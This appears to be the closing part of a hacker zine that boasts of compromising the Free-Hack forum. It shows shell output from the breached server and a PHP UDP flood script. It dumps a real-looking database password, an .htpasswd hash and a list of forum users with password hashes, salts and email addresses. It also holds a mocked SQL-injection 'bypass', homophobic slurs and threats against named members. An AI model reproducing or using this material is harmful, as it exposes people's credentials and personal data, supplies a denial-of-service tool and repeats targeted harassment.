4584-rw-r--r-- 1 freehack freehack 2712 Feb 3 2010 rbs_banner.php
4585-rw-r--r-- 1 freehack freehack 39751 Jan 18 2010 register.php
4586-rw-r--r-- 1 freehack freehack 5688 Jan 18 2010 report.php
4587-rw-r--r-- 1 freehack freehack 13720 Jan 18 2010 reputation.php
4588-rw-r--r-- 1 freehack freehack 124717 Jan 18 2010 search.php
4589-rw-r--r-- 1 freehack freehack 20694 Jan 18 2010 sendmessage.php
4590-rw-r--r-- 1 freehack freehack 10009 Jan 18 2010 showgroups.php
4591-rw-r--r-- 1 freehack freehack 11374 Jan 18 2010 showpost.php
4592-rw-r--r-- 1 freehack freehack 73470 Jan 18 2010 showthread.php
4593drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:59 signaturepics
4594drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 sitemap
4595-rw-r--r-- 1 freehack freehack 32848 Jan 18 2010 subscription.php
4596-rw-r--r-- 1 freehack freehack 51471 Sep 11 14:10 support.php
4597-rw-r--r-- 1 freehack freehack 13365 Jan 18 2010 tags.php
4598-rw-r--r-- 1 freehack freehack 8692 Jan 18 2010 threadrate.php
4599-rw-r--r-- 1 freehack freehack 12415 Jan 18 2010 threadtag.php
4600drwxrwxrwx 2 freehack freehack 4096 Dec 8 03:30 tmp
4601-rw-r--r-- 1 freehack freehack 34512 Jan 18 2010 usercp.php
4602-rw-r--r-- 1 freehack freehack 19098 Jan 18 2010 usernote.php
4603drwxrwxrwx 7 freehack freehack 4096 Nov 14 09:06 vboptimise
4604drwxr-xr-x 4 freehack freehack 4096 Dec 4 22:11 vbseo
4605-rw-r--r-- 1 freehack freehack 45172 Sep 14 01:00 vbseo.php
4606drwxr-xr-x 4 freehack freehack 4096 Nov 14 09:14 vbseo_sitemap
4607-rw-r--r-- 1 freehack freehack 4221 Sep 14 01:00 vbseocp.php
4608-rw-r--r-- 1 freehack freehack 27357 Jan 18 2010 visitormessage.php
4609-rw-r--r-- 1 freehack freehack 8431 Jan 18 2010 whoquotedme.php
4610-rw-r--r-- 1 freehack freehack 334 Oct 7 11:32 x.php
4611
4612
4613RETARDED PHP CODE ALERT!
4614
4615$ cat x.php
4616<?
4617if(!$_GET['target'])
4618{
4619 die('no target ip specified!');
4620}
4621$target = $_GET['t'];
4622
4623$sock=socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);
4624
4625if(!$sock) die(__LINE__);
4626
4627$data='';
4628for($i=0;$i<1400;$i++)
4629{
4630 $data.=chr(rand(0,255));
4631}
4632
4633while(true)
4634{
4635 if(!socket_sendto($sock,$data,strlen($data),0,$target,9)) die(__LINE__);
4636echo('.');
4637}
4638
4639?>
4640
4641
4642
4643$ cd 2tgh9322132k322l1sd
4644
4645$ ls
4646total 252
4647drwxr-xr-x 11 508 504 4096 Nov 14 09:24 .
4648drwxr-x--- 34 508 99 4096 Dec 4 22:13 ..
4649-rw-r--r-- 1 508 504 129 Nov 14 09:24 .htaccess
4650-rw-r--r-- 1 508 504 42 Nov 14 09:24 .htpasswd
4651drwxr-xr-x 2 508 504 4096 Nov 14 07:22 ReadMe
4652-rw-r--r-- 1 508 504 3661 Nov 14 09:20 config.php
4653-rw-r--r-- 1 508 504 58442 Sep 22 2009 config_overview.php
4654drwxr-xr-x 4 508 504 4096 Nov 14 07:16 css
4655-rw-r--r-- 1 508 504 19372 Sep 22 2009 dump.php
4656-rw-r--r-- 1 508 504 512 Nov 14 09:20 error_log
4657-rw-r--r-- 1 508 504 22059 Sep 22 2009 filemanagement.php
4658-rw-r--r-- 1 508 504 640 Sep 22 2009 help.php
4659drwxr-xr-x 2 508 504 4096 Nov 14 07:17 images
4660drwxr-xr-x 4 508 504 4096 Nov 14 07:18 inc
4661-rw-r--r-- 1 508 504 871 Sep 22 2009 index.php
4662-rw-r--r-- 1 508 504 24781 Sep 22 2009 install.php
4663drwxr-xr-x 4 508 504 4096 Nov 14 07:18 js
4664drwxr-xr-x 17 508 504 4096 Nov 14 07:22 language
4665-rw-r--r-- 1 508 504 5461 Sep 22 2009 log.php
4666-rw-r--r-- 1 508 504 1256 Sep 22 2009 main.php
4667-rw-r--r-- 1 508 504 3930 Sep 22 2009 menu.php
4668drwxr-xr-x 2 508 504 4096 Nov 14 07:22 msd_cron
4669-rw-r--r-- 1 508 504 776 Sep 22 2009 refresh_dblist.php
4670-rw-r--r-- 1 508 504 15762 Sep 22 2009 restore.php
4671-rw-r--r-- 1 508 504 10187 Sep 22 2009 sql.php
4672drwxr-xr-x 5 508 504 4096 Nov 14 07:22 tpl
4673drwxrwxrwx 5 508 504 4096 Nov 14 09:20 work
4674
4675$ cat .htpasswd
4676Suicide:$1$GTs9Hns/$lPMGV.EaLgyqwNxgTQSwf1
4677
4678$ cat config.php
4679<?php
4680// MySQL Dumper Configuration
4681
4682// Host-Adress, default 'localhost'
4683$config['dbhost'] = 'localhost';
4684// port - if empty, mysql uses default
4685$config['dbport'] = '';
4686// socket - if empty, mysql uses default
4687$config['dbsocket'] = '';
4688
4689// Username
4690$config['dbuser'] = 'freehack';
4691//User-Pass. For no Password leave empty
4692$config['dbpass'] = '7qm#2nwAc$oU';
4693
4694//Speed Values between 50 and 1000000
4695//use low values if you have bad connection or slow machines
4696$config['minspeed']=100;
4697$config['maxspeed']=50000;
4698
4699// Interface language and style
4700$config['language']='en';
4701$config['theme']='msd';
4702
4703//Shows the Serveradress if 1
4704$config['interface_server_caption']=1;
4705$config['interface_server_captioncolor']='#ff9966';
4706//Position of the Serveradress 0=left, 1=right
4707$config['interface_server_caption_position']=0;
4708
4709//Height of the SQL-Box in Mini-SQL in pixel
4710$config['interface_sqlboxsize']=70;
4711$config['interface_table_compact']=0;
4712
4713// Determine the maximum Amount for Memory Use in Bytes, 0 for no limit
4714$config['memory_limit']=100000;
4715
4716// For gz-Compression set to 1, without compression set to 0
4717$config['compression']=1;
4718
4719//Refreshtime for MySQL processlist in msec, use any value >1000
4720$config['processlist_refresh']=3000;
4721
4722$config['empty_db_before_restore']=0;
4723$config['optimize_tables_beforedump']=1;
4724$config['stop_with_error']=1;
4725
4726// For sending a mail after backup set send_mail to 1, otherless set to 0
4727$config['send_mail']=0;
4728// Attach the backup 0=no 1=yes
4729$config['send_mail_dump']=0;
4730// set the recieve adress for the mail
4731$config['email_recipient']='';
4732$config['email_recipient_cc']='';
4733// set the sender adress (the script)
4734$config['email_sender']='';
4735
4736//max. Size of Email-Attach, here 3 MB
4737$config['email_maxsize1']=3;
4738$config['email_maxsize2']=2;
4739
4740// FTP Server Configuration for Transfer
4741$config['ftp_transfer'][0]=0;
4742$config['ftp_timeout'][0]=30;
4743$config['ftp_useSSL'][0]=0;
4744$config['ftp_mode'][0]=0;
4745$config['ftp_server'][0]=''; // Adress of FTP-Server
4746$config['ftp_port'][0]='21'; // Port
4747$config['ftp_user'][0]=''; // Username
4748$config['ftp_pass'][0]=''; // Password
4749$config['ftp_dir'][0]=''; // Upload-Directory
4750
4751$config['ftp_transfer'][1]=0;
4752$config['ftp_timeout'][1]=30;
4753$config['ftp_useSSL'][1]=0;
4754$config['ftp_mode'][1]=0;
4755$config['ftp_server'][1]='';
4756$config['ftp_port'][1]='21';
4757$config['ftp_user'][1]='';
4758$config['ftp_pass'][1]='';
4759$config['ftp_dir'][1]='';
4760
4761$config['ftp_transfer'][2]=0;
4762$config['ftp_timeout'][2]=30;
4763$config['ftp_useSSL'][2]=0;
4764$config['ftp_mode'][2]=0;
4765$config['ftp_server'][2]='';
4766$config['ftp_port'][2]='21';
4767$config['ftp_user'][2]='';
4768$config['ftp_pass'][2]='';
4769$config['ftp_dir'][2]='';
4770
4771//Multipart 0=off 1=on
4772$config['multi_part']=0;
4773$config['multipartgroesse1']=1;
4774$config['multipartgroesse2']=2;
4775$config['multipart_groesse']=0;
4776
4777//Auto-Delete 0=off 1=on
4778$config['auto_delete']=0;
4779$config['max_backup_files']=3;
4780
4781//configuration file
4782$config['cron_configurationfile']='mysqldumper.conf.php';
4783//path to perl, for windows use e.g. C:perlbinperl.exe
4784$config['cron_perlpath']='/usr/bin/perl';
4785//mailer use sendmail(1) or SMTP(0)
4786$config['cron_use_sendmail']=1;
4787//path to sendmail
4788$sendmail_path=ini_get('sendmail_path');
4789$config['cron_sendmail']=$sendmail_path>'' ? $sendmail_path: '/usr/lib/sendmail -t -oi -oem';
4790
4791//adress of smtp-server
4792$config['cron_smtp']='localhost';
4793//smtp-port
4794$config['cron_smtp_port']=25;
4795$config['cron_extender']=0;
4796$config['cron_compression']=1;
4797$config['cron_printout']=1;
4798$config['cron_completelog']=1;
4799$config['cron_comment']='';
4800$config['multi_dump']=0;
4801$config['logcompression']=1;
4802$config['log_maxsize1']=1;
4803$config['log_maxsize2']=2;
4804$config['log_maxsize']=1048576;
4805
4806
4807 ________________________
4808 | |_____ __
4809 | FREE-HACK LIST OF LAME | |__| |_________
4810 |________________________| |::| | /
4811 /\**/\ | \.____|::|__| <
4812( o_o )_ | \::/ \._______\
4813 (u--u \_) |
4814 (||___ )==\
4815,dP"/b/=( /P"/b\
4816|8 || 8\=== || 8
4817`b, ,P `b, ,P
4818 """` """`
4819
4820AlterHacker:edcb38409dd601b93c6af3219d112557:9R#:BlackMaster@gmx.de
4821fred777:50a1eab4c63175c910df92d870136e43:^"@:nebelfrost77@googlemail.com
4822N1GH7FIR3:20ddb5d76b23f7e77cf82c9da0f685ee:QpY:daemonhunter.mail@gmail.com
4823100:f97becbc6292ac264119ca57881f643c:a<":ttorben@mailde.de
4824Dexx:f59393b26641a10966b1400b17f20a93:e>>:dexx@free-hack.com
4825noctem:23b5d90e4e8047f014ed439b092da804:l4i:noctem-fh@web.de
4826Vitamin X:249bd491e1a2a4241babd149c021775b:-;3:vitaminxfh@mail.ru
4827sn0w:3c5bc3d3863c3d06246e9dbb3563a46c:YHI:iop.123@arcor.de
4828Apex:2d6725508c6f575996e99add1df75b78:#fj:micki5004@hotmail.com
4829Toastbrot:92c5d47cb95b30c60a007af44c8e433a:GG::r4z3r2@gmx.de
4830inyourface:d78cd66e4cb181741dbedb122a6abb4a:LD6:xyzdf8461@gmx.de
4831H4x0r007:b7db51f35436e5ae0d398c8617b148f6:"zD:h4x0r2@web.de
4832meckl:c23f739948b0a1a5b3ad225bdf355641:bNL:meckl@privatdemail.net
4833J0hn.X3r:5311479819ac7652223469f9eb6afbf9:7\D:J0hn.X3r@gmail.com
4834#b:07ff2d241ac7b8bfda85295ad74532db:@ce:bizzit@live.de
4835enco:d02abd58ba8ddaa4e009970ba2aa4531:iV(:enne@bk.ru
4836Lidloses_Auge:df8b7b3b4a3879b62b4fa36794907425:}5*:lidlosesauge@gmail.com
4837Rip:0b8ccc848ca2de26becdb26635112e5f:.5%:libary.source@googlemail.com
4838PoLe:8b1a2783236cba650ab671ef1e3b5d69:U!w:klogger@gmx.de
4839GrafZeppelin:96d74a9a16342e578feabb787f9c4b65:}$/:gray_foxde@yahoo.de
4840GODFATHER:6e2494acbfdf1a2c8f9bc4bc58c83ba1:AGe:Mighty.Mo89@Gmail.com
4841Qgel:c1f57278216436f781d102fa254a077b:'yV:kug3lblitz@gmail.com
4842DvdRom:a51a070617594bd6321bfde8ba5f5de4:=q$:dvd_rom123@hotmail.com
4843Suicide:c4944d15980260f4e446b679e1769395:]fL:followtheleader@bk.ru
4844novaca!ne:8ee3a88448d320961ff82e8f350e21cd:BuY:novacaine@privatdemail.net
4845ea$y:1a8ef8a801b84e16a5a344babe49287e:V-7:localserver@gaza.net
4846krypt0n:855801493f43e3c7b3471e50c2ee2e7e:fZr:hellyeahima@atheist.com
4847
4848We think that novaca!ne's magic_quotes bypass is quite representative
4849for this group:
4850
4851--snip snip--
4852
4853Bypass magic_quotes (novaca!ne)
4854magic_quotes is a php setting (php.ini).
4855It causes that every ' (single-quote), " (double quote) and \ (backslash)
4856are escaped with a backslash automatically, a weak but wellknown securing method.
4857This is how to bypass it:
4858Use the funktion called „String.fromCharCode()“, you need to translate your MySQL command
4859into ascII (http://www.asciizeichen.de/tabelle.html) and put it input into the handling.
4860‘ OR ‘a’ = ‘a equals
4861String.fromCharCode(8216, 32, 79, 82, 32, 8216, 97, 8217, 32, 61, 32, 8216, 97)
4862
4863--snip snip--
4864
4865novaca!ne is (next to fred777) of course, our new security superhero!
4866Congratz, faggot...
4867
4868Finally we shouldn't forget our old fag superhero fred777, who helped
4869us to understand how we could get every source code of a page. This
4870sounds pretty hard, but fred777 shows his priv8 techniques (we fear
4871them):
4872
4873--snip snip--
4874#########################################################
4875# Sourcecode disclosure by social engineering
4876# tested on NPD
4877#########################################################
4878
4879Intro:
4880Ich schildere hier mal einen Fall, welchen ich letztens
4881noch vor mir hatte. Ich war durch Zufall mal wieder auf den
4882vielen NPD Seiten, um nach Lücken zu suchen.
4883Bei einer Subpage wurde ich dann auch fündig, zumindest erweckte
4884es den Anschein, als ob sich da eine SQL Injection befände.
4885
4886Sobald nämlich der Limitparameter falsch übergeben wurde, kam der
4887übliche SQL Error:
4888
4889---------------------------------------------------------
4890
4891Rein logisch sah der Query so aus:
4892
4893SELECT `cats` FROM fred (sonstiges) LIMIT $_GET['la'],10;
4894
4895Als ich dann mittels eines Scripts versuchte den Query mit UNION
4896zu erweitern, wollte es aber nicht funktionieren.
4897Klar dafür konnte es so einige Gründe geben, allerdings hätte
4898ich mir zu gerne den Source + Abfragen angeschaut.
4899
4900---------------------------------------------------------
4901
4902Wieso eigentlich nicht?
4903
4904Nach einigen Ãœberlegungen, schrieb ich dann eine Mail an den
4905Webmaster der Seite, mit dem Ziel, dass er mir den Source schickt.
4906
4907--snip snip--
4908
4909What we learned is:
4910- If we write an email to an admin we always get the source code
4911- fred777 uses tools to exploit some sql injection
4912
4913"o_O", one of the banned users puts it nicely: "being lame is one of
4914fred777's master skills" Just to inform you: We owned Free-Hack with
4915this technique of course.
4916
4917TIME FOR SOME
4918______________________________________________________________________
4919IlapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapsI
4920Isl_______l__slapslapslapsla_______a__lap__apslapslapslaps__pslap__apI
4921Ip| __| |.---.-.-----.| _ | |_| |_.---.-.----.| |--.| |aI
4922Ia|__ | || _ | _ || | _| _| _ | __|| < |__|lI
4923Il|_______|__||___._| __||___|___|____|____|___._|____||__|__||__|sI
4924Islapslapslapslapsla|__|pslapslapslapslapslapslapslapslapslapslapslapI
4925IpslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslaI
4926
4927Right, who deserves it? Correct! Suicide and enco for being badass
4928super high skilled computer professionals ... NOT
4929
4930This is a warning Free-Hack. Continue existing and we will show no
4931mercy. Especially you, J0hn.X3r. Take your chance, go and grow up.
4932
4933,_._._._._._._._|____________________________________________________
4934|_|_|_|_|_|_|_|_|___________________________________________________/
4935 ~ last words ~ !
4936
4937That's all for now. We hope that those we have owned understood the
4938warning and that those who already enjoyed issue one were satisfied
4939with this release. We will take a little break for now and go to
4940Hawaii to get our asses drunk. But do not fear. There will always be
4941enough time for us to audit more code, write more 0day and own more
4942idiots. We will always watch the scene and act if we are needed. There
4943is sill a lot to do and the winter of hax is not over yet. So do
4944expect us.
4945
4946 |\
4947 /()/
4948 \| - the happy ninjas
4949 ____________________________________________________|_._._._._._._._,
4950 \___________________________________________________|_|_|_|_|_|_|_|_|
4951 ! ~ OUTRO ~
4952 ,
4953 . |
4954 /
4955 \ I
4956 /
4957 \ .g88R_
4958 d888(` ). _
4959 - --==, 888( ),=-- .+(` )`.
4960) Y8P( '`, :( . )
4961 .+(`( , ) .-- `. ( ) )
4962 (( (..__,:'-' .=( ) ` _` ) )
4963`. `( ) ) ( , ) ( ) ._
4964 ) ` __.:' ) ( ( )) `-',:ccee88oo,
4965) ) ( ) --' `- __,' ccC8O8O8Q8PoOb.o8oo
4966.-' (_,' ,') pqdOB69QOFFE4OpugoO9bD
4967 .(_ ) CgggbbU8OU qOp qOdoUOdcb,
4968 . , .3X4X5U2M/p u gcoUodpP
4969 .\\\// /douUP
4970And shepherds we shall be, for thee my Lord for \\\////. (´`)
4971thee, power hath descended forth from thy hand, |||||. ,.(´ -.),.
4972that our feet may swiftly carry out thy command. |||/\, ( , ,)
4973We shall flow a river forth to thee, and teeming |||\/. `-´`´`´.
4974with souls shall it ever be. In nomine patris, |||||.
4975et filii, et spiritus sancti ,..,,.,.,....,,,,//||||\...,,,,
4976,...,...,..,...,,..,,.,.,..,,.,,,.,,,,,,,..,.,,,,...,.,.,...,,..,.
4977.,.,,,,..,..,.,..,,,,.,..,.,,.,..,..,,,,.,...,,..,,,..,..,....,..,..,.
4978© Offensive Security 2009-2015